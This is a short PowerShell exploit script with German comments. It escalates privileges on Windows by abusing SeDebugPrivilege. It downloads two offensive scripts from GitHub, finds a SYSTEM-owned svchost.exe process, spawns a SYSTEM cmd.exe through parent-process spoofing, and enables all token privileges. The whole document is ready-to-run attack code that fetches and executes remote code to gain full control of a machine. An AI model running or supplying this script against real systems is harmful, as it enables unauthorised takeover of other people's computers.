# SeDebugPrivilege Exploit Script
# Automatisch SYSTEM Shell via Parent Process Spoofing

# Schritt 1: Downloads
Write-Host "[*] Downloading tools..." -ForegroundColor Cyan
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1" -OutFile C:\Temp\psgetsys.ps1
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1" -OutFile C:\Temp\EnableAllTokenPrivs.ps1

# Schritt 2: Laden
Write-Host "[*] Loading modules..." -ForegroundColor Cyan
Import-Module C:\Temp\psgetsys.ps1

# Schritt 3: Höchste svchost.exe PID finden die SYSTEM gehört
Write-Host "[*] Finding highest SYSTEM svchost.exe PID..." -ForegroundColor Cyan
$highestPID = Get-WmiObject Win32_Process -Filter "Name='svchost.exe'" | 
    Where-Object { 
        (Get-WmiObject Win32_Process -Filter "ProcessId=$($_.ProcessId)").GetOwner().User -eq "SYSTEM" 
    } | 
    Sort-Object ProcessId -Descending | 
    Select-Object -First 1 -ExpandProperty ProcessId

Write-Host "[+] Found SYSTEM svchost.exe PID: $highestPID" -ForegroundColor Green

# Schritt 4: SYSTEM Shell spawnen
Write-Host "[*] Spawning SYSTEM shell..." -ForegroundColor Cyan
ImpersonateFromParentPid -ppid $highestPID -command "C:\Windows\system32\cmd.exe"

# Schritt 5: EnableAllTokenPrivs laden und ausführen
Write-Host "[*] Enabling all token privileges..." -ForegroundColor Cyan
. C:\Temp\EnableAllTokenPrivs.ps1

Write-Host "[+] Done! Check for new cmd.exe window." -ForegroundColor Green